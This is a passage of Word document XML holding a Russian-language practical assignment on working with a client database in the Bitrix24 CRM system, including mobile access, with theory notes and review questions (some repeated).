    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Провести работу с клиентской базой в CRM системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность бизнеса сегодня - это возможность быть на связи и обладать всеми ИТ-ресурсами своего офиса в месте присутствия клиента. Работа с CRM-системой в облаках, через терминальный доступ или мобильные клиенты iOS и Android - все это позволяет сотрудникам значительно ускорить коммуникации внутри компании по оформлению и выполнению заказа клиента, реакцию на его жалобу и другие процессы обслуживания. Руководители компании, департаментов и отделов могут на своих мобильных устройствах анализировать различные параметры деятельности компании.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Основные потребности в мобилизации бизнеса схожи у малого и крупного бизнеса. Однако, детализация информации в крупных компаниях гораздо выше. Например, небольшой компании по обслуживанию инженерных систем достаточно дать базовую информацию по заказу своим мобильным работникам. Детали будут неструктурировано отражены в поле </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>примечание</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> мобильного приложения. Для крупного бизнеса детализация заказа и его выполнения очень важна, т.к. на объеме всех операций возможна существенная экономия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Что касается руководителей, то в малом и крупном бизнесе количество анализируемых на мобильных устройствах параметров бизнеса может различаться на порядок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зависимость потребностей в мобильности от отрасли, конечно, прослеживается, однако стоит понимать, что в любом бизнесе можно получить эффект от внедрения мобильных CRM-технологий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность бизнеса напрямую связана с уровнем сервиса компании или, как минимум, существенно на него влияет. Основной эффект мобилизации - это ускорение всех клиентских и внутренних процессов компании, включая сервис.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Наиболее популярные мобильные способы доступа к CRM-системе в России: терминальный доступ, RDP и web-интерфейс с возможностью во всех трех вариантах получить полный мобильный доступ к функционалу настольной версии CRM-решения. Доступ через мобильные устройства (коммуникаторы и планшеты) ограничивает функционал, но более удобен для работы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на ходу</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или при выполнении ограниченного ряда операций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность приносит в бизнес новые возможности и новые угрозы безопасности критически важных данных. Требуется обратить пристальное внимание на вопросы разделения прав доступа и ограничения объема хранимых на мобильном устройстве данных. Каналы передачи данных должны шифроваться средствами, отвечающими отраслевым стандартам. Необходимо проводить работу с персоналом. Только комплексные меры позволят защитить данные от утечек и минимизиовать потери бизнеса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF0A98" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00964E54" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Освоение техники управления мобильными продажами (с корпоративного персонального компьютера (КПК), ноутбука или удаленный доступ) в CRM-систем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся изображения этапов работы с пояснениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Перейти на сайт CRM системы битрикс24 - https://www.bitrix24.ru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Зайти в CRM систему под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Проведите несколько операций с клиентами в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность бизнеса сегодня - это возможность быть на связи и обладать всеми ИТ-ресурсами своего офиса в месте присутствия клиента. Работа с CRM-системой в облаках, через терминальный доступ или мобильные клиенты iOS и Android - все это позволяет сотрудникам значительно ускорить коммуникации внутри компании по оформлению и выполнению заказа клиента, реакцию на его жалобу и другие процессы обслуживания. Руководители компании, департаментов и отделов могут на своих мобильных устройствах анализировать различные параметры деятельности компании.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Основные потребности в мобилизации бизнеса схожи у малого и крупного бизнеса. Однако, детализация информации в крупных компаниях гораздо выше. Например, небольшой компании по обслуживанию инженерных систем достаточно дать базовую информацию по заказу своим мобильным работникам. Детали будут неструктурировано отражены в поле </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>примечание</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> мобильного приложения. Для крупного бизнеса детализация заказа и его выполнения очень важна, т.к. на объеме всех операций возможна существенная экономия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Что касается руководителей, то в малом и крупном бизнесе количество анализируемых на мобильных устройствах параметров бизнеса может различаться на порядок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зависимость потребностей в мобильности от отрасли, конечно, прослеживается, однако стоит понимать, что в любом бизнесе можно получить эффект от внедрения мобильных CRM-технологий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность бизнеса напрямую связана с уровнем сервиса компании или, как минимум, существенно на него влияет. Основной эффект мобилизации - это ускорение всех клиентских и внутренних процессов компании, включая сервис.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Наиболее популярные мобильные способы доступа к CRM-системе в России: терминальный доступ, RDP и web-интерфейс с возможностью во всех трех вариантах получить полный мобильный доступ к функционалу настольной версии CRM-решения. Доступ через мобильные устройства (коммуникаторы и планшеты) ограничивает функционал, но более удобен для работы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на ходу</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или при выполнении ограниченного ряда операций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность приносит в бизнес новые возможности и новые угрозы безопасности критически важных данных. Требуется обратить пристальное внимание на вопросы разделения прав доступа и ограничения объема хранимых на мобильном устройстве данных. Каналы передачи данных должны шифроваться средствами, отвечающими отраслевым стандартам. Необходимо проводить работу с персоналом. Только комплексные меры позволят защитить данные от утечек и минимизиовать потери бизнеса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое CRM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какую информацию о клиенте целесообразно хранить?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие преимущества предоставляет владение информации о ваших клиентах?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Какие есть способы мобильного доступа в CRM систему?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Назовите преимущества мобильной CRM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Сравните мобильные CRM приложения и интернет порталы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Какие есть способы мобильного доступа в CRM систему?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Назовите преимущества мобильной CRM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Сравните мобильные CRM приложения и интернет порталы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_Toc507788279"/>
      <w:bookmarkStart w:id="225" w:name="_Toc507788554"/>
      <w:bookmarkStart w:id="226" w:name="_Toc26278754"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5 Создание базы данных клиентов средствами системы CRM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
      <w:bookmarkEnd w:id="225"/>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание базы данных клиентов средствами системы CRM. Формирование навыков работы в CRM-системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, CRM-система, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00964E54" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Провести удаленную работу с клиентской базой в CRM системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установить бесплатное мобильное приложение Битрикс24.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить его на смартфоне.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти в систему под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совершить несколько операций в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
